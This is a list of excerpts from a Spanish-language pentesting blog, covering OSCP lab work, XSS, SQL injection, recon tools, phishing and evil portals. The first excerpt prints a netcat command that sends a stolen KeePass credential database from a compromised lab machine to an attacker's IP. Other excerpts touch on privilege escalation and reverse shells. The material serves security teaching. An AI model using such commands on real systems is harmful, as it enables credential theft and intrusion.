by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 12, 2019 | Blog, Herramientas / tools
Cuando no trabajas en una empresa gigante que puede comprar un password cracking rig como el que les mostre aquí. Necesitas ponerte creativo en como descubres el password detras de un hash. Hay muchas formas de hacerlo. Unas son online: https://crackstation.net/ Otras...
by Ric | Sep 21, 2019 | Blog
Hace poco un amigo me recomendó el podcast darknetdiaries y es tan bueno que lo estoy empezando a escuchar desde los primeros capítulos. En 2012 (cuando escanear todo el internet desde un lugar era inpensable). Una persona hizo una botnet para escanear. Lo logro...
by Ric | Sep 5, 2019 | Blog, Herramientas / tools
Hola hoy dí un taller de como hackear páginas web. Lo que hice fue relativamente sencillo (modifiqué) la OWASP Juice Shop. La Juice shop es una aplicación super completa para hackear que incluye hasta guía con respuestas tipo lab. La corrimos en una Nuc de intel y...
by Ric | Aug 30, 2019 | Blog, Herramientas / tools
Para hacer un evilportal necesitas Flashea la USB card en advanced picale al triangulito y te va a aparecer la opcion Checa que tengas el ultimo firmware instala el modulo evilportal instala filezila y sigue estas instrucciones https://github.com/kbeflo/evilportals...
by Ric | Jul 27, 2019 | Blog
The Most Telling Cyber Security Statistics in 2019 Cybersecurity is often seen as one of those big problems that only large entities like banks, tech companies, and governments have to worry about. In reality, a lot more people should be concerned with cybersecurity...
by Ric | Jun 21, 2019 | Blog
Hace poco escribí un artículo donde les decía que muchos de los web pentest que hago tienen algun tipo de XSS. Igual les decía que es una vulnerablidad muy dificil de explicar y que normalmente los clientes no le dan la importancia que deberían. Ahora bien como...
by Ric | Jun 18, 2019 | Blog
Cuando empece a trabajar como pentester siempre me imagine que esto ya estaba casi resuelto y las vulnerabilidades que me encontraria serían super complejas PEEEEROOOOO les puedo decir que en casi todos nuestros clientes encontramamos al menos unos de estos. XSS es...
by Ric | Jun 10, 2019 | Blog
Como primer paso de un pentest siempre es bueno tener mucha información.Ya había escrito de SPARTA que es un programa en KALI que lo hace cuando le pones un IP pero esto es más de la parte manual del asunto. Muchas veces sin tocar a la “victima”. Como que...
by Ric | Jun 5, 2019 | Herramientas / tools
TheHarvester es una herramienta simple que se usa para obtener emails, nombres, subdomains, IPs, y URL de manera activa y pasiva. Esta instalado por default en kali, es open source y gratis. Qué más le puedes pedir a la vida? ja. theharvester -d [sitio.com] -b [where...
by Ric | Jun 4, 2019 | Herramientas / tools
Whatweb es una apliación muy complejo (pero a la vez fácil de usar) con 1800 pluggins que es actualizada con relativa frecuencia y es gratis. Osea una puta maravilla. Para que sirve? como su nombre lo indica es para responder “What is that Website? (Qué es este...
by Ric | May 25, 2019 | Blog, Herramientas / tools
Esto esta muy bueno, pero es un poco viejo. Te dice como hacer muchas pruebas con ejemplos. https://www.owasp.org/index.php/OWASP_Testing_Project PDF
by Ric | May 12, 2019 | Blog, Herramientas / tools
Cuando trabajas con un cliente, o cuando ya lograste hackear una computadora muchas veces tienes que pasar información de un equipo a otro puedes hacer un servidor y pasarte la información pero muchas veces un pad es más sencillo. Cuando no importa la información...
by Ric | May 3, 2019 | Blog, Herramientas / tools
Empezando con lo básico, que es un subdomain?Un subdomain es una parte de tu sitios que quieres que tenga un url unico pero no quieres comprar otro dominio. Las partes de un URL son: Porque queremos descrubirlos? Mientras más attack surface mejor. Normalmente puedes...
by Ric | Apr 30, 2019 | Blog
Este es un tutoriial que te explicará que hacer ANTES de empezar a hacer un pentest. Nosotros le decimos pre-engagement (lo intente traducir pero nada me convencio) Antes de empezar tienes que ponerte de acuerdo con el cliente en cosas legales y técnicas. Por tu...
by Ric | Apr 25, 2019 | Blog, Herramientas / tools
Hacer una camapaña de phishing es interesante pero normalmente solo tienes una oportunidad de hacerlo bien. Si lo haces mal, el usuario estará muy pendiente de las próximas. Hay muchas herramientas para hacerlo; Lucy esta increíble (en teoría pero nunca la he usado)...
by Ric | Apr 5, 2019 | Blog, Herramientas / tools
The Common Attack Pattern Enumeration and Classification (CAPEC™) effort provides a publicly available catalog of common attack patterns that helps users understand how adversaries exploit weaknesses in applications and other cyber-enabled capabilities. “Attack...
by Ric | Mar 28, 2019 | Herramientas / tools
Microsoft amablemente nos da formas de probar sus sistemas por 90 días. Hay dos grandes opciones El sitio de developers para probar edge > Aquí El sitio para probar lo más nuevo como windows 10 > Link Por supuesto que claro que si puedes tomar un snapshot el...
by Ric | Mar 22, 2019 | Herramientas / tools
LMGTFY ja. Dejame buscar eso en google te hace un link automático de tu pregunta y es la forma de trollear mas original que he visto en mi vida… http://lmgtfy.com/?q=como+hackeo+una+cuenta+de+facebook%3F por ejemplo
by Ric | Mar 18, 2019 | Blog
*Hoy un amigo me mando esto preguntándome que hacer* Esto claramente es falso pero esta muy bien hecho. ¿Cómo se que es falso? El tema… ja CIA te va a contactar para decirte que te va a arrestar pero no lo hará porque tienes dinero y puedes pagar? ja El email...
by Ric | Mar 2, 2019 | Blog, Herramientas / tools
Hace unos meses escribí que hay honeypots (o trampas para hackers) que se pueden activar cuando determinada actividad suceda. Por ejemplo cuando abran un archivo de word o cuando sigan un link. Pero en la vida real igual hay unos sistemas completos que simulan estar...
by Ric | Mar 1, 2019 | Blog, Herramientas / tools
GDPR es una regulación Europea que aplica para todas las organizaciones que usan datos de Europeos. El punto principal es darle control a las personas sobre sus datos. El GDPR “empezó” el 14 de abril 2016 pero se hizo obligatorio el 25 de mayo 2018. La...
by Ric | Feb 27, 2019 | Blog, Herramientas / tools
Este es un post para explicar como atacar SQLi. Entonces que es SQLi? Es cuando puedes inyectar información directamente a la base de datos e interactuar con ella. Normalmente esto te permite ver cosas que no debes o borrarlas. Igual puedes brincar authentication (lo...
by Ric | Feb 21, 2019 | Blog, Herramientas / tools
Hoy me encontré algo muy raro, la oficina de gobierno que estabamos hackeando tenía el verbo trace y se me hizo muy raro, nunca imagine que una organización de ese tamaño aún tuviera esos descuidos. Entonces, que son los verbos HTTP (métodos) son las formas que hay de...
by Ric | Jan 24, 2019 | Blog, Herramientas / tools
Hoy me mandaron una página incredible de funciones de Linux y como pueden ser ( abused to get the f**k break out ) brincadas si hay alguna misconfiguracion para elevar tus privilegios o hacer reverse shells. Aquí 🙂 Algunos ejemplos de los que ya usamos en hack the...